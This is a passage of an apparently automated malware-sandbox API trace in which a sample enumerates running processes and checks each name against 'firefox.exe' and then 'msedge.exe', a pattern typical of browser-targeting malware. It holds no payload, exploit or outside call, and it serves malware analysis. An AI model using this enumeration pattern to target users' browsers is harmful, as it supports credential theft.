th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0184.548] lstrcmpA (lpString1="omnipos.exe", lpString2="firefox.exe") returned 1 [0184.549] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.549] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0184.550] lstrcmpA (lpString1="spcwin.exe", lpString2="firefox.exe") returned 1 [0184.550] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.550] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0184.552] lstrcmpA (lpString1="spgagentservice.exe", lpString2="firefox.exe") returned 1 [0184.552] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.552] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0184.554] lstrcmpA (lpString1="utg2.exe", lpString2="firefox.exe") returned 1 [0184.554] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.554] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="seek.exe")) returned 1 [0184.555] lstrcmpA (lpString1="seek.exe", lpString2="firefox.exe") returned 1 [0184.555] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.556] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="responsenorth.exe")) returned 1 [0184.557] lstrcmpA (lpString1="responsenorth.exe", lpString2="firefox.exe") returned 1 [0184.557] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.557] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="nothing_him_doctor.exe")) returned 1 [0184.558] lstrcmpA (lpString1="nothing_him_doctor.exe", lpString2="firefox.exe") returned 1 [0184.558] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.558] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="must_dinner.exe")) returned 1 [0184.560] lstrcmpA (lpString1="must_dinner.exe", lpString2="firefox.exe") returned 1 [0184.560] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.560] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0184.561] lstrcmpA (lpString1="iexplore.exe", lpString2="firefox.exe") returned 1 [0184.562] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.562] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.563] lstrcmpA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0184.563] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.563] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x133c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0184.564] lstrcmpA (lpString1="backgroundTaskHost.exe", lpString2="firefox.exe") returned -1 [0184.565] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.565] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0184.566] lstrcmpA (lpString1="backgroundTaskHost.exe", lpString2="firefox.exe") returned -1 [0184.566] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.566] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="HxTsr.exe")) returned 1 [0184.567] lstrcmpA (lpString1="HxTsr.exe", lpString2="firefox.exe") returned 1 [0184.568] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.568] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x344, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0184.569] lstrcmpA (lpString1="UsoClient.exe", lpString2="firefox.exe") returned 1 [0184.569] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.569] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0184.570] lstrcmpA (lpString1="backgroundTaskHost.exe", lpString2="firefox.exe") returned -1 [0184.571] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.571] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1264, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0184.572] lstrcmpA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0184.572] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.572] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe90, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0184.574] lstrcmpA (lpString1="conhost.exe", lpString2="firefox.exe") returned -1 [0184.574] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.574] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x664, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0184.575] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="firefox.exe") returned 1 [0184.576] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.576] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0184.577] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="firefox.exe") returned 1 [0184.577] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.577] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0184.578] lstrcmpA (lpString1="backgroundTaskHost.exe", lpString2="firefox.exe") returned -1 [0184.578] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.579] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0184.580] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="firefox.exe") returned 1 [0184.580] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.580] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0184.581] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="firefox.exe") returned 1 [0184.582] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.582] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0184.798] lstrcmpA (lpString1="dllhost.exe", lpString2="firefox.exe") returned -1 [0184.799] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.799] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0184.800] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="firefox.exe") returned 1 [0184.800] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.801] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0184.802] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="firefox.exe") returned 1 [0184.802] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.802] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0184.804] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="firefox.exe") returned 1 [0184.804] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.804] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0184.805] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="firefox.exe") returned 1 [0184.805] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.806] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0184.807] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="firefox.exe") returned 1 [0184.807] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.807] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc8, pcPriClassBase=8, dwFlags=0x0, szExeFile="GIUmlOL.exe")) returned 1 [0184.808] lstrcmpA (lpString1="GIUmlOL.exe", lpString2="firefox.exe") returned 1 [0184.808] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.808] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0184.810] lstrcmpA (lpString1="dllhost.exe", lpString2="firefox.exe") returned -1 [0184.810] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.810] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5f842777, th32DefaultHeapID=0x0, th32ModuleID=0x8000a077, cntThreads=0x1, th32ParentProcessID=0x5ecd0000, pcPriClassBase=32764, dwFlags=0x14f198, szExeFile="")) returned 0 [0184.811] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0184.811] CloseHandle (hObject=0x648) returned 1 [0184.812] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateToolhelp32Snapshot") returned 0x7ffc5ecfe800 [0184.812] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x648 [0184.824] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32First") returned 0x7ffc5ed185d0 [0184.824] Process32First (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0184.826] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.826] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x84, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0184.827] lstrcmpA (lpString1="System", lpString2="msedge.exe") returned 1 [0184.827] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.827] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0184.828] lstrcmpA (lpString1="smss.exe", lpString2="msedge.exe") returned 1 [0184.829] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.829] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.830] lstrcmpA (lpString1="csrss.exe", lpString2="msedge.exe") returned -1 [0184.830] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.830] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0184.831] lstrcmpA (lpString1="wininit.exe", lpString2="msedge.exe") returned 1 [0184.831] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.832] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0184.961] lstrcmpA (lpString1="csrss.exe", lpString2="msedge.exe") returned -1 [0184.961] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.961] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0184.962] lstrcmpA (lpString1="winlogon.exe", lpString2="msedge.exe") returned 1 [0184.963] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.963] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0184.964] lstrcmpA (lpString1="services.exe", lpString2="msedge.exe") returned 1 [0184.964] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.964] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1bc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0184.965] lstrcmpA (lpString1="lsass.exe", lpString2="msedge.exe") returned -1 [0184.965] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.965] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.967] lstrcmpA (lpString1="svchost.exe", lpString2="msedge.exe") returned 1 [0184.967] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.967] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.968] lstrcmpA (lpString1="svchost.exe", lpString2="msedge.exe") returned 1 [0184.968] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.968] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0184.969] lstrcmpA (lpString1="dwm.exe", lpString2="msedge.exe") returned -1 [0184.969] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.970] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.971] lstrcmpA (lpString1="svchost.exe", lpString2="msedge.exe") returned 1 [0184.971] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.971] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.972] lstrcmpA (lpString1="svchost.exe", lpString2="msedge.exe") returned 1 [0184.973] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.973] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x380, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.974] lstrcmpA (lpString1="svchost.exe", lpString2="msedge.exe") returned 1 [0184.974] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.974] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.976] lstrcmpA (lpString1="svchost.exe", lpString2="msedge.exe") returned 1 [0184.976] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.976] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.977] lstrcmpA (lpString1="svchost.exe", lpString2="msedge.exe") returned 1 [0184.978] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.978] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.979] lstrcmpA (lpString1="svchost.exe", lpString2="msedge.exe") returned 1 [0184.979] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.979] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0184.980] lstrcmpA (lpString1="svchost.exe", lpString2="msedge.exe") returned 1 [0184.980] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.980] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0184.981] lstrcmpA (lpString1="spoolsv.exe", lpString2="msedge.exe") returned 1 [0184.982] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.982] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x524, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x344, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0184.983] lstrcmpA (lpString1="sihost.exe", lpString2="msedge.exe") returned 1 [0184.983] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.983] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x630, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0184.984] lstrcmpA (lpString1="RuntimeBroker.exe", lpString2="msedge.exe") returned 1 [0184.985] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Process32Next") returned 0x7ffc5ed186c0 [0184.985] Process32Next (in: hSnapshot=0x648, lppe=0x14f428 | out: lppe=0x14f428*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x664, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x64c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0184.986] lstrcmpA (lpString1="explorer.exe", lpString2="msedge.exe") returned -1 [0184.986] 